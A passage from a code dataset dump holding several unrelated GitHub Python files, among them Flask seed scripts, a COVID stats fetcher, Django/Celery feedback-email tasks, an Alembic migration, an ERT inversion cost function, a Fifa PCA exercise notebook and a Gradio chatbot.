seed_groups():\n group1 = Group(name='Starting 5')\n group2 = Group(name='Core')\n\n db.session.add(group1)\n db.session.add(group2)\n db.session.commit()\n\n\n\ndef undo_groups():\n if environment == \"production\":\n db.session.execute(f\"TRUNCATE table {SCHEMA}.groups RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(\"DELETE FROM groups\")\n\n db.session.commit()\n","repo_name":"cgalang9/Splitify","sub_path":"app/seeds/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39973450575","text":"import json\r\nimport requests\r\nimport subprocess as sp\r\n\r\nurl = \"https://api.rootnet.in/covid19-in/stats/latest\"\r\nresponse = requests.get(url)\r\nparsed=response.text\r\ndata=json.loads(parsed)\r\n\r\ndef official_data(CVD):\r\n #data printing of official data\r\n CVD['cc'] = data['data']['summary']['total']\r\n\r\n CVD['cci'] = data['data']['summary']['confirmedCasesIndian']\r\n\r\n CVD['ccf'] = data['data']['summary']['confirmedCasesForeign']\r\n\r\n CVD['recv'] = data['data']['summary']['discharged']\r\n\r\n CVD['dead'] = data['data']['summary']['deaths']\r\n\r\n CVD['active'] = CVD['cc']-(CVD['recv']+CVD['dead'])\r\n\r\n\r\ndef state_data(state, CVD):\r\n state_info = data['data']['regional'][state]\r\n\r\n CVD['cc'] = state_info['totalConfirmed']\r\n\r\n CVD['cci'] = state_info['confirmedCasesIndian']\r\n\r\n CVD['ccf'] = state_info['confirmedCasesForeign']\r\n\r\n CVD['recv'] = state_info['discharged']\r\n\r\n CVD['dead'] = state_info['deaths']\r\n\r\n CVD['active'] = CVD['cc']-(CVD['recv']+CVD['dead'])\r\n#Test code to see the number of states\r\n# for state in range(39):\r\n# try:\r\n# print(\"%s: '%s'\" % (state,data['data']['regional'][state]['loc']),end = \"\\n\") \r\n# except IndexError:\r\n# print(\"\\nBREAKING\\n-\")\r\n# break","repo_name":"AdwaitNPradhan/COVID-19-TRACKER-GUI","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39763237912","text":"import os\nimport time\nimport subprocess\nfrom celery import shared_task\nfrom .models import Station,Feedback,FeedbackInfo,AmazonRefShopList\nfrom datetime import datetime,timedelta\nfrom django.core.mail import send_mail,EmailMessage\nfrom django.template import loader\nfrom django.conf import settings\nimport pandas as pd\nfrom email.mime.image import MIMEImage\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport logging\nfrom selenium import webdriver\n\nlogger = logging.getLogger(\"django\")\n\n@shared_task\ndef update_feedback():\n feedback_list = FeedbackInfo.objects.all()\n for feedback in feedback_list:\n if not feedback.last_month:\n start_date = feedback.date\n last_month = start_date - timedelta(days=start_date.day-1) if start_date.day-1 else (start_date - timedelta(days=1)).replace(day=1)\n last_month_str = last_month.strftime('%Y-%m-%d')\n last_month_feedback = FeedbackInfo.objects.filter(date=last_month_str). \\\n filter(zone=feedback.zone).filter(shop_name=feedback.shop_name)\n if last_month_feedback:\n feedback.last_month = feedback.lifetime - last_month_feedback[0].lifetime\n if not feedback.last_week:\n start_date = feedback.date\n days = start_date.weekday() if start_date.weekday() else 7\n last_week = start_date-timedelta(days=days)\n last_week_str = last_week.strftime('%Y-%m-%d')\n print(start_date,last_week,last_week_str)\n last_week_feedback = FeedbackInfo.objects.filter(date=last_week_str).\\\n filter(zone=feedback.zone).filter(shop_name=feedback.shop_name)\n if last_week_feedback:\n feedback.last_week=feedback.lifetime-last_week_feedback[0].lifetime\n if not feedback.last_day:\n start_date = feedback.date\n last_day = start_date - timedelta(days=1)\n last_day_str = last_day.strftime('%Y-%m-%d')\n last_day_feedback = FeedbackInfo.objects.filter(date=last_day_str). \\\n filter(zone=feedback.zone).filter(shop_name=feedback.shop_name)\n if last_day_feedback:\n feedback.last_day = feedback.lifetime - last_day_feedback[0].lifetime\n feedback.save()\n\ndef feedback_image():\n now = datetime.now()\n last_monday = now if not now.weekday() else now - timedelta(days=now.weekday())\n start_monday = last_monday - timedelta(days=29*7)\n last_monday_str = last_monday.strftime(\"%Y-%m-%d\")\n start_monday_str = start_monday.strftime(\"%Y-%m-%d\")\n zone=\"US\"\n days = pd.date_range(start=start_monday_str, end=last_monday_str,freq=\"7D\")\n dates = [date.strftime(\"%Y-%m-%d\") for date in days]\n if now.weekday(): #今天不是星期一\n dates.pop(0)\n dates.append(now.strftime(\"%Y-%m-%d\"))\n shop_list = AmazonRefShopList.objects.filter(zone=zone).filter(type=\"feedback\")\n shop_name_list = [shop.shop_name for shop in shop_list]\n tuples = [(shop_name, date) for shop_name in shop_name_list for date in dates]\n index = pd.MultiIndex.from_tuples(tuples, names=['shop_name', 'day'])\n data_frame = pd.DataFrame(0, index=index, columns=['last_week'])\n feedback_list = FeedbackInfo.objects.filter(zone=zone).filter(date__in=dates)\n print(feedback_list)\n for feedback in feedback_list:\n print(feedback.shop_name,feedback.date)\n print(feedback.last_week)\n if feedback.last_week:\n #print(feedback.last_week)\n data_frame.loc[(feedback.shop_name, feedback.date.strftime(\"%Y-%m-%d\")), 'last_week'] = int(\n feedback.last_week)\n else:\n #print(\"no feedback last_week\")\n data_frame.loc[(feedback.shop_name, feedback.date.strftime(\"%Y-%m-%d\")), 'last_week'] = 0\n x = range(len(dates))\n # 创建绘图对象,figsize参数可以指定绘图对象的宽度和高度,单位为英寸,一英寸=80px\n\n # print(data_frame)\n plt.figure(figsize=(24,12))\n plt.xticks(x, dates, rotation=60)\n for shop_name in shop_name_list:\n last_week = list(map(int, data_frame.loc[shop_name]['last_week'].values))\n plt.plot(x, last_week,label=shop_name)\n #plt.show()\n plt.legend(loc='upper center',ncol=3)\n #plt.title(\"周增长量

\")\n base_path = settings.IMAGE_PATH\n base_file_path = os.path.join(base_path,\"feedback_line_base{}.png\".format(int(time.time())))\n final_file_path = os.path.join(base_path, \"feedback_line{}.png\".format(int(time.time())))\n plt.savefig(base_file_path) # 保存图\n im = Image.open(base_file_path)\n box = (200,100,2250,1200) # 设置要裁剪的区域\n region = im.crop(box)\n region.save(final_file_path)\n return final_file_path\n\ndef add_img(src, img_id):\n \"\"\"\n 在富文本邮件模板里添加图片\n :param src:\n :param img_id:\n :return:\n \"\"\"\n fp = open(src, 'rb')\n msg_image = MIMEImage(fp.read())\n fp.close()\n msg_image.add_header('Content-ID', '<'+img_id+'>')\n return msg_image\n\n@shared_task\ndef send_email():\n now = datetime.now()\n now_str = now.strftime(\"%Y-%m-%d\")\n date_str = now.strftime(\"%Y%m%d\")\n zone_list = AmazonRefShopList.objects.filter(type=\"feedback\").values(\"zone\").distinct().all()\n # print(zone_list)\n zones = [zone['zone'] for zone in zone_list]\n zone_feedback_list =[]\n for zone in zones:\n shop_list = AmazonRefShopList.objects.filter(zone=zone).filter(type=\"feedback\").order_by(\"shop_name\")\n # print(shop_list)\n ordering = 'CASE WHEN shop_name=\"NEON MART\" THEN 1 ELSE 2 END'\n feedback_count_list = FeedbackInfo.objects.filter(date=now_str).filter(zone=zone).extra(\n select={'ordering': ordering}, order_by=('ordering','shop_name'))\n shop_url_dict = dict((shop.shop_name, shop.shop_url) for shop in shop_list)\n feedback_table_data = []\n for feedback_count in feedback_count_list:\n feedback_table_data.append({\n 'date': feedback_count.date.strftime(\"%Y-%m-%d\"),\n 'shop_name': feedback_count.shop_name,\n 'shop_url': shop_url_dict[feedback_count.shop_name],\n 'last_30_days': feedback_count.last_30_days,\n 'last_90_days': feedback_count.last_90_days,\n 'last_12_months': feedback_count.last_12_months,\n 'lifetime': feedback_count.lifetime,\n 'last_day': feedback_count.last_day,\n 'last_week': feedback_count.last_week,\n 'last_month': feedback_count.last_month,\n 'zone': feedback_count.zone,\n })\n zone_feedback_list.append(feedback_table_data)\n\n email_template_name = '../templates/monitor/email.html'\n t = loader.get_template(email_template_name)\n context={'zone_feedback_list':zone_feedback_list,'date':now_str}\n html_content = t.render(context)\n #send_mail('Feedback统计'+date_str,\n # '',\n # settings.EMAIL_FROM,\n # settings.EMAIL_TO,\n # html_message=html_content)\n\n msg = EmailMessage('Feedback统计'+date_str, html_content, settings.EMAIL_FROM,settings.EMAIL_TO)\n msg.content_subtype = 'html'\n msg.encoding = 'utf-8'\n image_path = feedback_image()\n image = add_img(image_path, 'test_cid')\n msg.attach(image)\n if msg.send():\n return True\n else:\n return False\n\n@shared_task\ndef execute_crawler(spider):\n now=datetime.now()\n today = now.strftime(\"%Y-%m-%d\")\n old_path = os.getcwd()\n logger.debug(old_path)\n os.chdir(settings.SCRAPY_PROJECT_DIR)\n log_file_name = \"%s.log\"%(today)\n # cmd = settings.SCRAPY_CMD_PATH+\" crawl \"+spider+\" >> \"+os.path.join(settings.SCRAPY_LOG_DIR,spider,log_file_name)+\" 2>&1\"\n cmd = settings.SCRAPY_CMD_PATH+\" crawl \"+spider\n logging.debug(cmd)\n subprocess.call(cmd,shell=True)\n os.chdir(old_path)\n\ndef get_pict():\n driver = webdriver.PhantomJS()\n try:\n driver.maximize_window()\n except Exception as err:\n print(err)\n driver.get(\"http://localhost:8000/monitor/feedback_week/\")\n time.sleep(3)\n base_path = settings.IMAGE_PATH\n time_str = int(time.time() * 10000000)\n image_path = os.path.join(base_path, \"week{}.png\".format(time_str))\n image_path_png = os.path.join(base_path, \"{}.png\".format(time_str))\n driver.get_screenshot_as_file(image_path) # 比较好理解\n driver.quit()\n\n","repo_name":"zhat/system","sub_path":"monitor/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37506957295","text":"\"\"\"empty message\n\nRevision ID: ae76d1bd8ee0\nRevises: 4584e821a172\nCreate Date: 2022-12-10 16:54:58.069419\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ae76d1bd8ee0'\ndown_revision = '4584e821a172'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.add_column(sa.Column('first_friend', sa.Text(), nullable=True))\n batch_op.add_column(sa.Column('first5_friends', sa.Text(), nullable=True))\n batch_op.add_column(sa.Column('story_array', sa.Text(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('users', schema=None) as batch_op:\n batch_op.drop_column('story_array')\n batch_op.drop_column('first5_friends')\n batch_op.drop_column('first_friend')\n\n # ### end Alembic commands ###\n","repo_name":"griffinlaszlo/snata","sub_path":"migrations/versions/ae76d1bd8ee0_.py","file_name":"ae76d1bd8ee0_.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5630866249","text":"\"\"\"\ntools for ERT inversion including ERT cost functions for inversion\n\nby l.gross@uq.edu.au, 2021, 2028\n\"\"\"\n\nfrom esys.escript import *\nfrom esys.escript.minimizer import CostFunction, MinimizerException\nfrom .tools import setupERTPDE\n\nimport numpy as np\nfrom esys.escript.linearPDEs import LinearSinglePDE, SolverOptions\nfrom esys.escript.pdetools import Locator, ArithmeticTuple, MaskFromTag, getInfLocator\nimport logging\nfrom esys.weipa import saveVTK, saveSilo\n\nlslogger=logging.getLogger('fingal')\n\nclass PotentialERT(CostFunction):\n provides_inverse_Hessian_approximation=True\n def __init__(self, domain, data, w0=0., w1=1., alpha0=1., alpha1=0., sigma0=.01, region_fixed=Data(), stationsFMT=\"e%s\", weightLogDefect=0., logclip=15):\n \"\"\"\n cost function for ERT inversion based on potential data. The unknown of the inversion is\n \n m=alpha0*p - alpha1 div(grad(p)) with p=log(sigma/sigma0)\n \n where sigma is the unknown conductivity and sigma0 an assumed conductivity.\n \n the regularization R(m) is a combination of L2 and H1:\n \n R(m) = 1/2 * integrate( w0*m**2 + w1* |grad(m)|^2 )\n \n The misfit is given quadratic \n \n :param domain: inversion domain\n :param data: data, is ERTSurveyData object supporting makeResistencePrediction and getResistenceData\n :param w0: weighting for L2 regularization\n :param w1: weighting for H1 regularization\n :param sigma0: reference conductivity\n :param region_fixed: mask for fixed conductivity distribution (this where the value sigma0 is used)\n :param stationsFMT: format used to map station keys k to mesh tags stationsFMT%k \n :param logclip: values of log(sigma/sigma0)>logclip are set to logclip to avoid overflow\n \"\"\"\n super(PotentialERT, self).__init__()\n\n assert weightLogDefect <= 1 and weightLogDefect >=0, \"weightLogDefect needs to be between 0 and 1\"\n self.stationsFMT=stationsFMT\n self.w0=w0\n self.w1=w1\n self.alpha0=alpha0\n self.alpha1=alpha1\n self.setSigma0(sigma0)\n self.data=data\n self.logclip=logclip\n self.sfactor=1./float(self.data.getNumObservations())\n self.weightLogDefect=weightLogDefect\n \n self.pde=setupERTPDE(domain)\n\n x=self.pde.getDomain().getX()[0]\n y=self.pde.getDomain().getX()[1]\n z=self.pde.getDomain().getX()[2]\n self.pde.setValue(q=whereZero(x-inf(x))+whereZero(x-sup(x))+ whereZero(y-inf(y))+whereZero(y-sup(y))+whereZero(z-inf(z)))\n\n # used for Hessian inverse\n self.Hpde=setupERTPDE(domain)\n self.Hpde.setValue(A=self.w1*kronecker(3), D=self.w0, q=region_fixed)\n\n if self.alpha1 > 0: \n self.Spde=setupERTPDE(domain) \n self.Spde.setValue(A=self.alpha1*kronecker(3), D=self.alpha0)\n else:\n self.Spde=None\n \n \n station_locations=[]\n for s in self.data.getStationNumeration():\n station_locations.append(self.data.getStationLocation(s))\n self.locators=Locator(Solution(domain), station_locations)\n \n \n def _getDualProduct(self, m, r):\n \"\"\"\n dual product of gradient `r` with increment `m`. Overwrites `getDualProduct` of `MeteredCostFunction`\n \"\"\"\n return integrate(r[0]*m + inner(r[1], grad(m)))\n \n def _getNorm(self, m):\n \"\"\"\n returns the norm of property function `m`. Overwrites `getNorm` of `MeteredCostFunction`\n \"\"\"\n return Lsup(m)\n\n def _getArguments(self, m):\n \"\"\"\n returns values that are used for both the forward as well as the gradient calculation\n \"\"\"\n # smooth m by solving m = alpha0*p - alpha1 div(grad(p)) \n if self.Spde:\n self.Spde.setValue(Y=m)\n p=self.Spde.getSolution()\n ppi=clip(interpolate(p, Function(self.pde.getDomain())), minval=-self.logclip, maxval=self.logclip)\n else:\n ppi=clip(interpolate(m/self.alpha0, Function(self.pde.getDomain())), minval=-self.logclip, maxval=self.logclip)\n # now calculate the new sigma\n sigma=self.getSigma(ppi, isSmoothed=True)\n if getMPIRankWorld() == 0:\n lslogger.info(\"sigma = %s\"%str(sigma))\n \n # now we solve for all electrodes creating a dictionary `potentials[ip]` and potentials_at_stations[ip] where `ip` is the electrode id.\n # note that we not distinguish between charging and measuring electrodes.\n self.pde.setValue(A=sigma*kronecker(3))\n potentials={}\n potentials_at_stations={}\n for ip in self.data.getListOfAllStations():\n s=Scalar(0.,DiracDeltaFunctions(self.pde.getDomain()))\n if self.stationsFMT is None:\n s.setTaggedValue(ip,1.)\n else: \n s.setTaggedValue(self.stationsFMT%ip,1.)\n self.pde.setValue(y_dirac=s)\n u=self.pde.getSolution()\n potentials[ip]=u\n potentials_at_stations[ip]=np.array(self.locators(u))\n if getMPIRankWorld() == 0:\n lslogger.info(\"Potential for %d electrodes calculated.\"%len(potentials))\n dV=self.data.makeResistencePrediction(values=potentials_at_stations)\n\n return sigma, potentials, dV\n \n def optimizeSigma0(self, m=0):\n \"\"\"\n this returns a corrected value (float) for sigma0 that gives a better initial data match \n \"\"\"\n sigma, potentials, dV=self.getArguments(m)\n A1=0.\n A2=0.\n for t in self.data.tokenIterator(): \n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t)\n if abs(d) > 0:\n A1+=v/(d*e**2)\n A2+=(v/(d*e))**2\n if A2 > 0 and A1 >0:\n f_opt=A1/A2 \n else:\n f_opt=1.\n sigma_opt=self.sigma0/f_opt\n\n defect=0.\n for t in self.data.tokenIterator(): # t=(A,B,M,N) (or so)\n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t)\n defect+=((f_opt*v-d)/(e*d))**2\n defect*=self.sfactor\n return sigma_opt, 1./f_opt, defect\n \n def scaleSigma0(self, f=1.):\n \"\"\"\n rescales sigma0 by factor f\n \"\"\"\n self.sigma0*=f\n \n def getSigma(self, m, isSmoothed=False):\n \"\"\"\n return the conductivity for a given property function m\n \"\"\"\n if not isSmoothed:\n if self.Spde :\n self.Spde.setValue(Y=m)\n p=self.Spde.getSolution()\n else:\n p=m/self.alpha0\n else:\n p=m\n return self.sigma0*exp(p)\n \n def _getValue(self, m, *args):\n \"\"\"\n return the value of the cost function. Overwrites `getValue` of `MeteredCostFunction`\n \"\"\"\n if len(args)==0:\n args=self.getArguments(m)\n sigma=args[0] \n potentials=args[1]\n dV=args[2]\n \n # regularization terms:\n A1=integrate(self.w1*length(grad(m))**2)\n A0=integrate(self.w0*interpolate(m, Function(self.pde.getDomain()))**2)\n\n # misfit\n A2, A3=0., 0.\n for t in self.data.tokenIterator(): # t=(A,B,M,N) (or so)\n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t)\n difflog=log(abs(v/d))/e\n diffquad=(v-d)/(e*d)\n \n A2+=difflog**2\n A3+=diffquad**2\n\n A2*=self.sfactor\n A3*=self.sfactor\n if getMPIRankWorld() == 0:\n lslogger.info(\"reg: L0, H1, misfit: log, quad = %e, %e, %e, %e\"%(A0/2, A1/2, A2/2, A3/2))\n \n return (A0+A1+(1-self.weightLogDefect)*A3+self.weightLogDefect*A2)/2\n \n\n def _getGradient(self, m, *args):\n \"\"\"\n returns the gradient of the cost function. Overwrites `getGradient` of `MeteredCostFunction`\n \"\"\"\n if len(args)==0:\n args=self.getArguments(m)\n sigma=args[0] \n potentials=args[1]\n dV=args[2]\n \n # gradient of the regularization part:\n X=self.w1*grad(m)\n Y=self.w0*interpolate(m,X.getFunctionSpace())\n\n #defects={}\n #for s in self.data.injectionIterator(): # s=(A,B)\n #defects[s]=Scalar(0, DiracDeltaFunctions(self.pde.getDomain()))\n Y2=Scalar(0., Y.getFunctionSpace())\n for inj in self.data.injectionIterator():\n if self.data.hasDipoleInjections():\n u=potentials[inj[0]]-potentials[inj[1]]\n idx=2\n else:\n u=potentials[inj]\n idx=1\n ustar=Scalar(0, u.getFunctionSpace())\n for t in self.data.getObservations(inj, insertSource=True):\n v=dV[t]\n d=self.data.getResistenceData(t)\n e=self.data.getResistenceRelError(t) \n\n difflog=safeDiv( log(abs(v/d)) , v*e**2)\n diffquad=(v-d)/(e*d)**2 \n diff=((1-self.weightLogDefect)*diffquad+self.weightLogDefect*difflog)*self.sfactor\n if self.data.hasDipoleMeasurements():\n M,N=t[idx:]\n ustar+=(potentials[M]-potentials[N])*diff\n else:\n M=t[idx]\n ustar+=potentials[M]*diff\n Y2+=inner(grad(ustar),grad(u))\n Y2*=-sigma\n\n if self.Spde:\n self.Spde.setValue(Y=Y2)\n p=self.Spde.getSolution()\n Y+=interpolate(p, Function(self.pde.getDomain()))\n else:\n Y+=Y2/self.alpha0\n \n return ArithmeticTuple(Y, X)\n \n def _getInverseHessianApproximation(self, m, r, *args):\n \"\"\"\n returns an approximation of inverse of the Hessian. Overwrites `getInverseHessianApproximation` of `MeteredCostFunction`\n \"\"\"\n self.Hpde.setValue(X=r[1], Y=r[0])\n p=self.Hpde.getSolution()\n return p\n","repo_name":"LutzGross/fingal","sub_path":"bin/fingal/potentialERT.py","file_name":"potentialERT.py","file_ext":"py","file_size_in_byte":10196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"14791523902","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Desafio 5\n# \n# Neste desafio, vamos praticar sobre redução de dimensionalidade com PCA e seleção de variáveis com RFE. Utilizaremos o _data set_ [Fifa 2019](https://www.kaggle.com/karangadiya/fifa19), contendo originalmente 89 variáveis de mais de 18 mil jogadores do _game_ FIFA 2019.\n# \n# > Obs.: Por favor, não modifique o nome das funções de resposta.\n\n# ## _Setup_ geral\n\n# In[1]:\n\n\nfrom math import sqrt\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as sct\nimport seaborn as sns\nimport statsmodels.api as sm\nimport statsmodels.stats as st\nfrom sklearn.decomposition import PCA\n\n#!pip install loguru\nfrom loguru import logger\n\n\n# In[2]:\n\n\n# Algumas configurações para o matplotlib.\n#%matplotlib inline\n\nfrom IPython.core.pylabtools import figsize\n\n\nfigsize(12, 8)\n\nsns.set()\n\n\n# In[3]:\n\n\n#!pip install logger\n\n\n# In[4]:\n\n\nfifa = pd.read_csv(\"fifa.csv\")\n\n\n# In[5]:\n\n\ncolumns_to_drop = [\"Unnamed: 0\", \"ID\", \"Name\", \"Photo\", \"Nationality\", \"Flag\",\n \"Club\", \"Club Logo\", \"Value\", \"Wage\", \"Special\", \"Preferred Foot\",\n \"International Reputation\", \"Weak Foot\", \"Skill Moves\", \"Work Rate\",\n \"Body Type\", \"Real Face\", \"Position\", \"Jersey Number\", \"Joined\",\n \"Loaned From\", \"Contract Valid Until\", \"Height\", \"Weight\", \"LS\",\n \"ST\", \"RS\", \"LW\", \"LF\", \"CF\", \"RF\", \"RW\", \"LAM\", \"CAM\", \"RAM\", \"LM\",\n \"LCM\", \"CM\", \"RCM\", \"RM\", \"LWB\", \"LDM\", \"CDM\", \"RDM\", \"RWB\", \"LB\", \"LCB\",\n \"CB\", \"RCB\", \"RB\", \"Release Clause\"\n]\n\ntry:\n fifa.drop(columns_to_drop, axis=1, inplace=True)\nexcept KeyError:\n logger.warning(f\"Columns already dropped\")\n\n\n# ## Inicia sua análise a partir daqui\n\n# In[6]:\n\n\n# Sua análise começa aqui.\n\n\n# In[7]:\n\n\n#fifa.fillna(0,inplace=True)\nfifa.dropna(inplace=True)\n\n\n# In[8]:\n\n\nfifa.shape\n\n\n# In[9]:\n\n\nfifa.describe()\n\n\n# In[10]:\n\n\nfifa.dtypes\n\n\n# In[11]:\n\n\n#plt.figure(figsize=(20,20))\n#sns.heatmap(fifa.corr().round(2),annot=True)\n\n\n# In[12]:\n\n\nfrom sklearn.preprocessing import StandardScaler, Normalizer\n\n\n# In[13]:\n\n\nsc= StandardScaler()\nsc.fit(fifa)\nfifa2 = sc.transform(fifa)\n\n\n# In[14]:\n\n\nfifa2\n\n\n# In[15]:\n\n\npca = PCA(n_components=1)\npca.fit(fifa)\nfifa_pca = pca.transform(fifa)\n\n\n# In[16]:\n\n\nfirst_question = float(pca.explained_variance_ratio_)\nround(first_question,3)\n\n\n# In[17]:\n\n\npca2 = PCA()\npca2.fit(fifa)\nfifa_pca2 = pca2.transform(fifa)\n\n\n# In[18]:\n\n\nfifa_pca2[0]\n\n\n# In[19]:\n\n\nnp.cumsum(pca2.explained_variance_ratio_)\n\n\n# In[20]:\n\n\n#plt.plot(np.cumsum(pca2.explained_variance_ratio_))\n\n#plt.ylim(0.5,0.95)\n#plt.xlabel('Number of components')\n#plt.ylabel('Cumulative explained variance')\n#plt.show()\n\n\n# In[21]:\n\n\nx = [0.87747123, -1.24990363, -1.3191255, -36.7341814,\n -35.55091139, -37.29814417, -28.68671182, -30.90902583,\n -42.37100061, -32.17082438, -28.86315326, -22.71193348,\n -38.36945867, -20.61407566, -22.72696734, -25.50360703,\n 2.16339005, -27.96657305, -33.46004736, -5.08943224,\n -30.21994603, 3.68803348, -36.10997302, -30.86899058,\n -22.69827634, -37.95847789, -22.40090313, -30.54859849,\n -26.64827358, -19.28162344, -34.69783578, -34.6614351,\n 48.38377664, 47.60840355, 45.76793876, 44.61110193,\n 49.28911284\n]\n\n\n# In[22]:\n\n\npca4 = PCA(2)\npca4.fit(fifa)\n\n\n# In[23]:\n\n\n#a_inv = pca4.inverse_transform(x)\n#a_inv\nnp.dot(pca4.components_,x)\n\n\n# In[24]:\n\n\na = [2,3,4]\nb = [2,4,2]\nc = [a,b]\nnp.dot\n\n\n# In[24]:\n\n\n\n\n\n# ## Questão 1\n# \n# Qual fração da variância consegue ser explicada pelo primeiro componente principal de `fifa`? Responda como um único float (entre 0 e 1) arredondado para três casas decimais.\n\n# In[25]:\n\n\ndef q1():\n # Retorne aqui o resultado da questão 1.\n return round(first_question,3)\n\n\n# ## Questão 2\n# \n# Quantos componentes principais precisamos para explicar 95% da variância total? Responda como un único escalar inteiro.\n\n# In[26]:\n\n\ndef q2():\n # Retorne aqui o resultado da questão 2.\n return 15\n\n\n# ## Questão 3\n# \n# Qual são as coordenadas (primeiro e segundo componentes principais) do ponto `x` abaixo? O vetor abaixo já está centralizado. Cuidado para __não__ centralizar o vetor novamente (por exemplo, invocando `PCA.transform()` nele). Responda como uma tupla de float arredondados para três casas decimais.\n\n# In[27]:\n\n\nx = [0.87747123, -1.24990363, -1.3191255, -36.7341814,\n -35.55091139, -37.29814417, -28.68671182, -30.90902583,\n -42.37100061, -32.17082438, -28.86315326, -22.71193348,\n -38.36945867, -20.61407566, -22.72696734, -25.50360703,\n 2.16339005, -27.96657305, -33.46004736, -5.08943224,\n -30.21994603, 3.68803348, -36.10997302, -30.86899058,\n -22.69827634, -37.95847789, -22.40090313, -30.54859849,\n -26.64827358, -19.28162344, -34.69783578, -34.6614351,\n 48.38377664, 47.60840355, 45.76793876, 44.61110193,\n 49.28911284\n]\n\n\n# In[40]:\n\n\ndef q3():\n # Retorne aqui o resultado da questão 3.\n return tuple(np.dot(pca4.components_,x).round(3))\n\n\n# In[30]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[31]:\n\n\nfeatures = list(fifa.columns)\nfeatures2 = []\nfor i in range(0,15):\n features2.append(features[i])\n\n\n# In[32]:\n\n\nfeatures2\n\n\n# In[33]:\n\n\nfrom sklearn.feature_selection import RFE\ntarget_feature = 'Overall'\ny_train = fifa[target_feature]\nx_train = fifa.drop(columns=target_feature)\nrfe = RFE(LinearRegression(), n_features_to_select = 5).fit(x_train, y_train)\n\n\n# In[34]:\n\n\nrfe.support_\n\n\n# In[35]:\n\n\nlocal_features = []\nfor i in range(0,len(rfe.support_)):\n if rfe.support_[i] == True:\n local_features.append(i)\n\n\n# In[36]:\n\n\nlocal_features\n\n\n# In[37]:\n\n\nlist_name = []\nfiltred_features = list(x_train.columns)\nfor j in local_features:\n list_name.append(filtred_features[j])\n\n\n# In[38]:\n\n\nlist_name\n\n\n# ## Questão 4\n# \n# Realiza RFE com estimador de regressão linear para selecionar cinco variáveis, eliminando uma a uma. Quais são as variáveis selecionadas? Responda como uma lista de nomes de variáveis.\n\n# In[39]:\n\n\ndef q4():\n # Retorne aqui o resultado da questão 4.\n return list_name\n\n","repo_name":"lucascmdias/Codenation-Exercicios-Modulos","sub_path":"data-science-3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40541339079","text":"import gradio as gr\nfrom langchain.llms import OpenAI\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nclass Chatbot:\n MAIN_PROMPT = \"Você é um ajudante de almoxarifado e deve ajudar com o que for necessário.\"\n\n def __init__(self):\n self.llm = OpenAI(model=\"gpt-3.5-turbo-instruct\", max_tokens=512)\n\n def generate_chat_history(self, history):\n parsed_history = \"CHAT HISTORY:\\n\"\n for i, (user, bot) in enumerate(history):\n parsed_history += f\"USER: {user}\\nBOT: {bot}\\n\"\n parsed_history += \"\\nEND OF HISTORY\\n\"\n return parsed_history\n\n def chatbot_response(self, message, history):\n parsed_history = self.generate_chat_history(history)\n prompt = f\"{Chatbot.MAIN_PROMPT}\\n{parsed_history}\\n{message}\"\n\n response = \"\"\n for partial_message in self.llm.stream(prompt):\n response += partial_message\n yield response\n\n\nclass ChatInterface:\n def __init__(self, chatbot):\n self.chatbot = chatbot\n\n def launch(self):\n chat_interface = gr.ChatInterface(\n self.chatbot.chatbot_response,\n examples=[\n \"Quais EPIs são necessários para operar um torno mecânico?\",\n \"Quais EPIs são necessários para operar uma fresadora?\",\n \"O que fazer em caso de incêndio?\",\n \"O que fazer em caso de vazamento de produtos químicos?\",\n ],\n title=\"Chatbot\",\n )\n chat_interface.launch()\n\n\nif __name__ == \"__main__\":\n chatbot_instance = Chatbot()\n chat_interface_instance = ChatInterface(chatbot_instance)\n chat_interface_instance.launch()\n","repo_name":"ViniciosLugli/2023-2B-T2-M8-P3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71039855295","text":"\n\ndef isPrime(num):\n for x in range(2, num, 1):\n if num % x == 0:\n return False\n \n return True\n\ndef firstTenPrimes():\n count = 0\n num = 2\n\n while count < 10:\n if(isPrime(num)):\n print(num, end=' ')\n count += 1\n \n num += 1\n \nif __name__ == \"__main__\":\n try: \n print('First ten prime numbers: ', end='')\n firstTenPrimes()\n except: \n print('Error.')\n\n \n\n","repo_name":"Veigabriel25/mdc-test","sub_path":"primeNumbers.py","file_name":"primeNumbers.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17147232313","text":"import itertools\nfrom JSolve import *\n\ndef compute_possible_left_sides():\n \"\"\"\n Return all permutations of [1,2,3,4,5,6,7,8,9] for the left side\n that are compatible with 